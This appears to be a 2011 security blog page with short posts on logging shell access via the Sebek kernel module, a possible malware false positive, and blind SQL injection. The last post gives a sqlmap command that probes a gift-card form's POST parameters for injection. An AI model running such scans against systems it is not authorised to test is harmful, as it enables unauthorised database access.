Pages

What Programming Language Should I Use to Build a Startup?

Often entrepreneurs ask me 'What technology should I build my startup on?' There is no right or wrong answer to this question. It's a decision every company makes for itself, depending on what it's trying to build and the skills of its cofounders. Nonetheless, there are a few rules that one should adhere to. We discuss them in this blog post.

Incident Response Policy

What happens in your company when a production incident occurs? Usually in a typical startup, you will see engineers running around frantically trying to resolve the problem. However, as soon as the incident is resolved, they forget about it and go back to their usual business. A good incident response policy can help bring order into chaos. We provide a sample template in this blog post.

Why Software Deadlines Never Make Sense

We discuss why software deadlines usually don't make sense.

Analyzing Front-End Performance With Just a Browser

We discuss a number of freely available online tools which can be used to analyze bottlenecks in your website.

Why Smaller Businesses Can't Ignore Security and How They Can Achieve It On a Budget

In this article, we show that security is both important and achievable for smaller companies without breaking a bank.

Monday, January 31, 2011

logging in production systems


I've been investigating some solutions for logging access to production unix boxes (standard centos/rhel). The main product in the market is PowerBroker which doesn't come cheap. I came across Sebek, an open source tool developed as part of Honeynet project. It's a rather interesting idea which implements an LKM (linux kernel module) which hooks into sys_read() call. In addition to performing the regular read(...) function, it also sends all the data across the network to a Sebek server.
It seems like a rather transparent change, but I am still worried about hacking with LKMs on production systems.

Here is how the deployment looks:


Does anyone use it?

Friday, January 28, 2011

RegMechanic a virus?

Just scanned a popular program Registry Mechanic, which is used to speed up your computer on virustotal.com and it seems to report it as PUA.Packed.Armadillo-2 .

The reviews on CNET look good so RegMechanic appears to be legit software. It could be that a packer is used to optimize its size, which triggers a false alarm by ClamAV on virustotal.com. Or ... is everyone mistakened and thinking a malicious program is good?

Thursday, January 27, 2011

Good idea, bad implementation

Tuesday, January 25, 2011

Blind SQL injection with POST params

In a blind sql injection, the attacker mangles the parameters of the webpage to try to detect if SQL injection is possible.
A very useful tool to do that is sqlmapat. However, most tutorials I found focus just on injecting the GET (or query string) parameters. For example, the webpage could be http://www.example.com?id=1 and you are trying to find if by mangling parameter id you can cause an injection.
Most of the time however the params are going to be hidden in a POST form and you can't easily point the sqlmapat tool at it.

Today, though, I found a useful article describing how to use sqlmapat with POST form params for SQL injection.
Here it is: http://bit.ly/faUlo

A sample usage is

python sqlmap.py -u "http://www.site.com/giftcard" --method "POST" --data "code=1234&amount=25.00"